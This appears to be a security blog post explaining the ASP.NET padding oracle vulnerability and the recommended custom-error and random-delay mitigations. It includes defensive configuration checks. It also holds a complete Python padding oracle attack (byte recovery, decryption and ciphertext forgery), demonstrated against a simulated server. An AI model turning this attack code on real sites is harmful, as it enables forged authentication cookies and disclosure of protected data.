Troy Hunt: Fear, uncertainty and the padding oracle exploit in ASP.NET

You’ve gotta feel a bit sorry for Scott Guthrie. Microsoft’s developer division VP normally spends his time writing about all the great new work his team is doing and basking in the kudos of loyal followers. But not this weekend. Unfortunately, his latest post has been all about repeating the same dire message: ASP.NET has a major security flaw posing a critical vulnerability to millions of websites. Actually, that’s putting it nicely; much of the feedback on the web is a little blunter, talking about the vulnerability totally destroying ASP.NET security. Ouch.

Actually, it’s not so much the fact he had to write the post that makes me feel sorry for him; it’s that he has to continually respond to the same questions from (understandably) fearful, worried customers. That’s not surprising: the vulnerability is a little abstract to understand and the potential ramifications are rather scary. Furthermore, the mitigations he has recommended, namely around error handling, probably seem a little obscure.

This is an issue which is quite possibly going to consume a bit of my time in the coming weeks, so I thought I’d start right now by explaining what the vulnerability is, what remediation is required and, most importantly, actually showing how the mitigations address the problem. It’s this last point that I don’t think Scott quite captured, and I suspect that’s why there is so much uncertainty now.

Sep 25th update: I’ve also written about Why sleep is good for your app’s padding oracle
Sep 29th update: The patch and how to test for it in Do you trust your hosting provider and have they really installed the padding oracle patch?

The exploit in action

Let’s start out with a bang. Just in case you haven’t already heard about the exploit or seen what it can do, watch this before reading any further. This was demonstrated at the Ekoparty conference in Argentina a few days ago:

What just happened? In short, there were three simple steps:

1. The ciphertext appended to a web resource request was retrieved from the HTML source of the page. This is effectively an encrypted version of the resource identifier, and it’s the encryption behind it that the exploit sets out to break.
2. The Padding Oracle Exploit Tool (POET) is given the URL of the site and the ciphertext from step 1. It then sets out to break the encryption. This is the heart of what the exploit is all about.
3. The broken encryption is then used to create a new encrypted cookie with super user rights to the DotNetNuke instance under attack. This cookie is simply added to the browser, granting the attacker all the rights they could desire over the target site.

This particular example goes on to load a malicious payload onto the server, allowing command line access from the UI, but the damage was really done in step 3. In very simple terms, the exploit allows normally secure artefacts generated by the server to be decrypted and forged.

What’s all this got to do with Oracle?

No, not Oracle, oracle. More specifically, it’s about the oracle used against padding, which in cryptography is all about discovering whether the plain text inside an encrypted string was correctly padded out to fit neatly into blocks of eight bytes. There’s a fantastic overview of how this works in Automated Padding Oracle Attacks with PadBuster if you want to understand it in depth; I’m just going to distil it to the basics. This info is almost entirely from that post (as is the first image I’ve borrowed), so all credit to those guys. No guarantees on me getting all of this 100% right, but hopefully the gist of it will come through OK.

Imagine every encrypted string has to consume a multiple of eight bytes of data. In order to do this, different amounts of padding are required for different string lengths:

[Figure: padding required for plain text strings of different lengths, borrowed from the PadBuster post]

One thing you’ll notice is that each padding byte represents the total number of bytes in the padding. For example, FIG has five padding bytes of 0x05. If the encrypted version of FIG decrypted to five padding bytes that weren’t all 0x05, the server would throw an error. In short, the response of the server can disclose whether the encrypted value is correctly padded or not. From the link above, this is called a padding oracle because:
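The padding rule described here is what’s usually called PKCS#5 (for eight-byte blocks) or PKCS#7 padding. A minimal Python sketch of adding it and of the validity check a server performs after decryption; the function names are hypothetical:

```python
BLOCK_SIZE = 8  # eight-byte blocks, as in the examples in this post


def pad(data: bytes, block_size: int = BLOCK_SIZE) -> bytes:
    """Append n bytes of value n so the length becomes a multiple of block_size."""
    n = block_size - len(data) % block_size  # 1..block_size; a full extra block if aligned
    return data + bytes([n]) * n


def padding_is_valid(data: bytes, block_size: int = BLOCK_SIZE) -> bool:
    """The check whose pass/fail result becomes an oracle if the server reveals it."""
    if not data or len(data) % block_size:
        return False
    n = data[-1]
    return 1 <= n <= block_size and data[-n:] == bytes([n]) * n


print(pad(b"FIG").hex(" "))                          # 46 49 47 05 05 05 05 05
print(padding_is_valid(b"FIG\x05\x05\x05\x05\x05"))  # True
print(padding_is_valid(b"FIG\x05\x05\x05\x04\x05"))  # False
```

Note that a string which already fills a block exactly still gets a whole extra block of padding, so the last byte is always a valid length marker.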

The term oracle refers to a mechanism that can be used to determine whether a test has passed or failed.

Here’s where it gets interesting: if an encrypted string can be passed to the server and its response tells you whether the padding is valid or not, the request can be manipulated by repeatedly changing its bytes and reissuing it to the server until a successful response is returned. The bytes this technique manipulates are those of the initialisation vector (IV), which is the eight bytes preceding the encrypted string. During decryption, each IV byte is XORed with the corresponding byte of the decrypted block, so the IV directly controls the plain text whose padding the server ends up checking.
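The byte-level trick can be written out as a short derivation. This assumes CBC mode (which is where the IV comes in), with $D_K$ the block decryption under the server’s secret key, $C_1$ the first ciphertext block, $IV'$ the attacker’s modified IV and $[8]$ the last of the eight bytes:

```latex
\begin{aligned}
P_1 &= D_K(C_1) \oplus IV && \text{what the server normally decrypts} \\
P'_1 &= D_K(C_1) \oplus IV' && \text{the same block with the attacker's IV} \\
P'_1[8] = \mathtt{0x01} &\implies D_K(C_1)[8] = IV'[8] \oplus \mathtt{0x01} && \text{server reports valid padding} \\
P_1[8] &= D_K(C_1)[8] \oplus IV[8] = IV'[8] \oplus \mathtt{0x01} \oplus IV[8]
\end{aligned}
```

The next step sets $IV'[8]$ so that byte 8 decrypts to 0x02 and searches byte 7 for a 0x02 0x02 ending, and so on. A guess can occasionally pass at the first step because it produced a longer valid padding such as 0x02 0x02, so that first hit is usually double-checked.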

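If the IV can be manipulated until the last byte of the block decrypts to a valid padding value and the server confirms this by not returning an error, the attacker learns that byte of the block’s raw decrypted value. The process can then be repeated for each preceding byte (targeting 0x02 0x02, then 0x03 0x03 0x03 and so on) until all eight are known. XORing those bytes with the original IV reveals the plain text, and because each ciphertext block acts as the IV for the block after it, the same technique works through the remaining ciphertext. A similar process can be used to encrypt a new string.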
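Putting the pieces together, here’s a self-contained Python sketch of the whole attack against a simulated server. Everything in it is an assumption made for illustration: the real ASP.NET cipher is replaced by a toy four-round Feistel cipher built from HMAC-SHA256 (invertible but not secure), CBC mode with a prepended IV is assumed, and `oracle()` stands in for “did the server return an error?”. The hypothetical `intermediate()` recovers one block’s raw decrypted value byte by byte, `decrypt()` XORs that with the preceding block, and `forge()` runs the same trick backwards from an arbitrary final block to build ciphertext for a chosen string, such as a new cookie value.

```python
import hashlib
import hmac
import os

BLOCK = 8  # eight-byte blocks, as in the post's examples

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

# ---- Toy server: 4-round Feistel cipher over HMAC-SHA256 (NOT secure) ----
def _f(key: bytes, i: int, half: bytes) -> bytes:
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:4]

def block_encrypt(key: bytes, blk: bytes) -> bytes:
    left, right = blk[:4], blk[4:]
    for i in range(4):
        left, right = right, _xor(left, _f(key, i, right))
    return left + right

def block_decrypt(key: bytes, blk: bytes) -> bytes:
    left, right = blk[:4], blk[4:]
    for i in reversed(range(4)):
        left, right = _xor(right, _f(key, i, left)), left
    return left + right

def pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def cbc_encrypt(key: bytes, plaintext: bytes, iv: bytes) -> bytes:
    out, prev, data = [iv], iv, pad(plaintext)
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(key, _xor(data[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)  # the IV travels in front of the ciphertext

def cbc_decrypt(key: bytes, message: bytes) -> bytes:
    blocks = [message[i:i + BLOCK] for i in range(0, len(message), BLOCK)]
    return b"".join(_xor(block_decrypt(key, c), p) for p, c in zip(blocks, blocks[1:]))

def make_oracle(key: bytes):
    def oracle(message: bytes) -> bool:  # True ~ "no error", False ~ "HTTP 500"
        plain = cbc_decrypt(key, message)
        n = plain[-1]
        return 1 <= n <= BLOCK and plain[-n:] == bytes([n]) * n
    return oracle

# ---- Attacker: only ever calls oracle(), never sees the key ----
def intermediate(oracle, blk: bytes) -> bytes:
    """Recover D_K(blk), last byte first, by forging the IV placed in front of it."""
    inter = bytearray(BLOCK)
    for pad_len in range(1, BLOCK + 1):
        pos = BLOCK - pad_len
        forged = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):
            forged[j] = inter[j] ^ pad_len  # already-known bytes now decrypt to pad_len
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged) + blk):
                continue
            if pad_len == 1:  # rule out an accidental 0x02 0x02 (etc.) ending
                forged[pos - 1] ^= 0xFF
                genuine = oracle(bytes(forged) + blk)
                forged[pos - 1] ^= 0xFF
                if not genuine:
                    continue
            inter[pos] = guess ^ pad_len
            break
        else:
            raise RuntimeError("no guess produced valid padding")
    return bytes(inter)

def decrypt(oracle, message: bytes) -> bytes:
    blocks = [message[i:i + BLOCK] for i in range(0, len(message), BLOCK)]
    plain = b"".join(_xor(intermediate(oracle, c), p) for p, c in zip(blocks, blocks[1:]))
    return plain[:-plain[-1]]  # strip the padding

def forge(oracle, plaintext: bytes) -> bytes:
    """Build IV + ciphertext that decrypts to plaintext, working backwards."""
    data = pad(plaintext)
    blocks = [os.urandom(BLOCK)]  # arbitrary final ciphertext block
    for i in range(len(data) - BLOCK, -1, -BLOCK):
        blocks.insert(0, _xor(intermediate(oracle, blocks[0]), data[i:i + BLOCK]))
    return b"".join(blocks)

key = os.urandom(16)  # known only to the simulated server
oracle = make_oracle(key)
cookie = cbc_encrypt(key, b"user=alice", os.urandom(BLOCK))
print(decrypt(oracle, cookie))
forged = forge(oracle, b"role=superuser")
plain = cbc_decrypt(key, forged)  # what the server would see
print(oracle(forged), plain[:-plain[-1]])
```

The attacker-side functions never touch `key`; every recovered byte comes from yes/no answers, which is exactly why hiding those answers is where the mitigation focuses.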

This exploit isn’t actually new; it was reported eight years back by Swiss cryptographer Serge Vaudenay. What is new is the way it’s been applied against ASP.NET and the fact this particular attack vector has now been published.

What can you do with this?

An awful lot, unfortunately. The obvious answer is that you can decrypt any encrypted strings accessible to the client, which means query strings, hidden form fields and cookies. The other problem is that because the same mechanism can be used to encrypt data, you can roll your own cookies. The DotNetNuke exploit in the video works because a perfectly valid cookie indicating the client is a super user could be forged and passed to the server without the server being any the wiser. This isn’t a DotNetNuke vulnerability; it could conceivably occur with any ASP.NET site which implements authentication.

But there’s another exploit which Scott touches on in his post without going into too much detail: the web.config can be downloaded.

The attack that was shown in the public relies on a feature in ASP.NET that allows files (typically javascript and css) to be downloaded, and which is secured with a key that is sent as part of the request. Unfortunately if you are able to forge a key you can use this feature to download the web.config file of an application (but not files outside of the application).

Although I can’t find any specific references to it, I believe what Scott’s referring to is the ability to request web resources with a forged resource ID which, rather than pointing to the usual JavaScript or CSS, instead points to another resource in the app. From the Working with Web Resources page:

The URL for WebResource.axd looks like the following:

WebResource.axd?d=SbXSD3uTnhYsK4gMD8fL84_mHPC5jJ7lfdnr1_WtsftZiUOZ6IXYG8QCXW86UizF0&t=632768953157700078

The format of this URL is WebResource.axd?d=encrypted identifier&t=time stamp value. The "d" stands for the requested Web Resource. The "t" is the timestamp for the requested assembly, which can help in determining if there have been any changes to the resource.

You can see how the identifier is an appended query string value and, as the video earlier showed, these requests simply return the resource in its entirety.
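Step 1 of the attack, lifting the ciphertext out of the page, needs nothing more than URL parsing. A Python sketch using the sample URL quoted above; it assumes the `d` value follows the convention of ASP.NET’s `HttpServerUtility.UrlTokenEncode` (URL-safe base64 with the `=` padding replaced by one trailing digit counting how many were removed), and the `url_token_decode` name is hypothetical:

```python
import base64
from urllib.parse import parse_qs, urlsplit


def url_token_decode(token: str) -> bytes:
    """Decode a value assumed to use the UrlTokenEncode convention:
    '-' and '_' instead of '+' and '/', and a trailing digit giving the
    number of '=' padding characters that were stripped."""
    padding = int(token[-1])
    return base64.urlsafe_b64decode(token[:-1] + "=" * padding)


url = ("WebResource.axd?d=SbXSD3uTnhYsK4gMD8fL84_mHPC5jJ7lfdnr1_WtsftZiUOZ6IXYG8QCXW86UizF0"
       "&t=632768953157700078")
params = parse_qs(urlsplit(url).query)
ciphertext = url_token_decode(params["d"][0])
# Opaque bytes only: decoding is not decrypting, and the key stays on the server
print(len(ciphertext), "bytes; multiple of 8:", len(ciphertext) % 8 == 0)
print("timestamp:", params["t"][0])
```

Under that assumption both sample `d` values in this post decode to a whole number of eight-byte blocks, which is what you’d expect from block cipher output.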

What’s vulnerable?

Basically any ASP.NET-based product: obviously ASP.NET websites and DotNetNuke, but also SharePoint and ASP.NET MVC. Of course, this also extends to products like Umbraco that are built on top of the framework.

Mitigation

Scott makes two recommendations from which a lot of confusion then flows:

Enable custom errors with response rewriting and a single error page for all error types.
Add a random sleep delay to the error page.

On the surface of it, these seem like rather odd ways of addressing a cryptography vulnerability, but there’s method in the madness. Both these recommendations are designed to obfuscate the fact a server error has occurred. If the attacker is not being told when their manipulated IV is causing an error versus when it’s passing through successfully, the ability to exploit the vulnerability is severely hobbled.

Managing server errors

Let’s look at how using a single custom errors page helps the situation. I’ve created a standard web app with all the usual out-of-the-box settings and configured an IIS website against it on port 85. By default, the following JavaScript is embedded in the page (we don’t have to use a web resource file; the same logic applies to any other resource executing on the server):

<script src="/WebResource.axd?d=8KdqlbnKlEkJNojRMjxtSxbXkp67u-rzhy_VoqsYA901&amp;t=634200755509128189" type="text/javascript"></script>

Now, if I manipulate the resource ID (the “d” query string value), reissue the request and monitor the response with Fiddler, here’s what I see:

By returning a 500 response code, IIS has just confirmed the server has thrown an error. Now let’s make the first change Scott recommended, namely creating a dedicated error page, setting the redirect mode to response rewriting and adding the page as the default redirect in the custom errors node:

Now we’re getting a 200 response which, for all intents and purposes, means it was a successful request, at least as far as the headers go. You’ll also see the requested URL is the web resource and not the error page. This is one important point that wasn’t fully explained in Scott’s post: the redirect mode must be set to “ResponseRewrite”. If not, the default “ResponseRedirect” value will be applied and here’s what will happen:

Now we’re getting an HTTP 302 redirect, which asks the browser to make a separate request for “Error.aspx?aspxerrorpath=/WebResource.axd”. This pretty much gives the game away and confirms that an error has been thrown as a result of the request. By rewriting the response instead, the error page is returned in the initial response to the request which caused the server error rather than in a subsequent one.

Some people have asked if just turning custom errors on by specifying <customErrors mode="On" /> is sufficient. Unfortunately it’s not, and here’s why:

This once again exposes the HTTP 500 response code, so although it has the advantage of not revealing the specific internal error, it still indicates the request has failed.
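The configuration checks in this section can also be expressed in code. This hypothetical Python helper reads a web.config and flags `<customErrors>` settings that would still let an attacker tell responses apart: custom errors switched off, no `defaultRedirect`, the default `ResponseRedirect` mode, or per-status `<error>` pages. It assumes the `<configuration>` element carries no XML namespace; the attribute names and their defaults are those of the standard customErrors element.

```python
import xml.etree.ElementTree as ET


def check_custom_errors(web_config: str) -> list:
    """Return reasons why error responses could still be told apart (empty list = OK)."""
    root = ET.fromstring(web_config)
    node = next(root.iter("customErrors"), None)
    if node is None:
        return ["no <customErrors> element"]
    problems = []
    if node.get("mode", "RemoteOnly") == "Off":  # RemoteOnly is ASP.NET's default
        problems.append('mode="Off" shows detailed errors to everyone')
    if not node.get("defaultRedirect"):
        problems.append("no defaultRedirect: failing requests still return HTTP 500")
    if node.get("redirectMode", "ResponseRedirect") != "ResponseRewrite":
        problems.append("not ResponseRewrite: a 302 to the error page reveals the error")
    for err in node.findall("error"):  # per-status pages, e.g. a custom 404
        problems.append(f"separate page for status {err.get('statusCode')}")
    return problems


config = """<configuration>
  <system.web>
    <customErrors mode="On" redirectMode="ResponseRewrite" defaultRedirect="~/Error.aspx" />
  </system.web>
</configuration>"""
print(check_custom_errors(config))  # []
```

Running the same check against a bare `<customErrors mode="On" />` reports two problems: the missing default redirect and the redirect mode.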

The other thing Scott asks you to configure in the custom errors (or rather, not configure) is different error pages for different error codes. A lot of people have asked what this means for their custom 404 page not found error pages, often used to provide a functional value to the user (i.e. when an external link points to a now defunct page). Here’s his message, repeated many, many times:

One of the ways this attack works is that looks for differentiation between 404s and 500 errors. It can use this differentiation to try out potential keys (typically over tens of thousands of requests). Always returning the same HTTP code and sending them to the same place is one way to help block it.

I haven’t seen the attack Scott talks about in practice, but what’s obvious is that it’s looking for particular resources within the application. Not returning a 404 page not found hides from automated attacks the fact that a resource doesn’t actually exist. Yes, it has a usability impact and possibly other issues beyond that (search engine crawlers, perhaps?), but he’s consistently emphatic about avoiding this particular response code, so there’s obviously something in it.

Sep 20th update: the 404 risk is this. If the padding oracle exploit is attempted against the resource ID in the WebResource.axd request and the manipulated IV is correct in the context of the ciphertext but the resource doesn’t exist, a 404 is returned, whereas an invalid IV causes a 500. That difference is exactly the signal the attack needs. With a single error page for everything, the same response is returned whether the IV was valid or not, which makes gradually incrementing each IV byte and using the response as a success measure pointless. Under Scott’s recommendations, the only way the error page isn’t returned is if the resource ID is correct and a valid resource is found.
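The reasoning in this update can be captured in a deliberately simplified model. The names and response labels below are hypothetical and not traced from ASP.NET itself; the model only encodes the claim that random IV guesses almost never hit a real resource, so the attack lives or dies on telling bad padding apart from good padding that points at nothing:

```python
from enum import Enum


class Outcome(Enum):
    BAD_PADDING = 1       # manipulated IV breaks the padding: exception on the server
    MISSING_RESOURCE = 2  # padding valid, but the decrypted ID points at nothing
    FOUND = 3             # padding valid and the ID names a real resource


def response(outcome: Outcome, mitigated: bool) -> str:
    """Simplified, hypothetical model of what the client observes."""
    if outcome is Outcome.FOUND:
        return "HTTP 200 + resource"
    if not mitigated:
        return "HTTP 500" if outcome is Outcome.BAD_PADDING else "HTTP 404"
    # One error page for every error, served via ResponseRewrite
    return "generic error page"


def oracle_is_useful(mitigated: bool) -> bool:
    # Random guesses almost never reach FOUND, so the attack depends on
    # BAD_PADDING and MISSING_RESOURCE looking different
    return response(Outcome.BAD_PADDING, mitigated) != response(Outcome.MISSING_RESOURCE, mitigated)


print(oracle_is_useful(mitigated=False))  # True
print(oracle_is_useful(mitigated=True))   # False
```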

Having a little sleep

The other recommendation Scott makes is to add a small, random sleep to the error page. Essentially, what he’s suggesting is varying the error page’s load time to avoid establishing a pattern which could be used to identify when an error response is being returned. Exploiting that kind of pattern is often referred to as a “remote timing” attack.
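A minimal Python sketch of the random-delay idea. The function names, the error message and the 0 to 255 ms range are assumptions for illustration, not taken from Scott’s post; `secrets.randbelow` is used so the delay comes from a cryptographically strong source rather than a predictable generator, and `sleep` is injectable so the handler can be exercised without actually waiting:

```python
import secrets
import time

MAX_DELAY_MS = 255  # assumed upper bound for the random delay


def random_delay_seconds(max_ms: int = MAX_DELAY_MS) -> float:
    """Return a delay of 0..max_ms milliseconds drawn from a CSPRNG."""
    return secrets.randbelow(max_ms + 1) / 1000


def render_error_page(sleep=time.sleep) -> str:
    """Hypothetical error handler: wait a random interval, then return the one generic page."""
    sleep(random_delay_seconds())
    return "An error occurred while processing your request."
```

Jitter like this doesn’t remove a timing difference outright; an attacker averaging over enough requests may still see one. It simply raises the number of requests needed, which fits the “one more layer of defence” view.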

I know what you’re thinking: does adding a few milliseconds here or there really improve the security of my app? Quite a lot has been written on this subject; Exploiting remote timing attacks is but one of many resources which discuss the practice. If you really want endorsement of why Scott’s suggestion has some merit, here’s an interesting tweet from one of the duo who produced the video:

And if there’s no big timing difference? I’m sure there’s still a way but its one more layer of defence. And it’s free.

Summary

I would have liked to have gone into this vulnerability a lot deeper. I’ve not successfully run the exploit and have instead spent the day reading and absorbing information. I’ve seen enough today to be convinced this exploit poses a serious risk, and that alone is worth writing about, particularly in terms of shedding some light on the rationale behind The Gu’s recommendations.

This is one of those “first thing Monday morning” types of vulnerabilities. As word has spread over the last couple of days and the impact has begun to sink in, there are going to be a lot of devs arriving at the office tomorrow morning with some work to do. If you’re responsible for any ASP.NET website and you’re not making some pretty speedy changes tomorrow morning, your site may just be one of the first compromised by this exploit.

Scott makes multiple mentions of a patch coming from Microsoft but is very non-committal on exactly when we’ll see it. We also don’t know what form the patch will take; will it be a patch to the framework requiring a server install and all the governance (and lead time) that goes along with it? Or will it mean redeploying apps? One thing’s for sure: it will require some legwork, and getting started on the mitigation early by following his guidance is the only smart thing to do at this stage.

We live in interesting times.
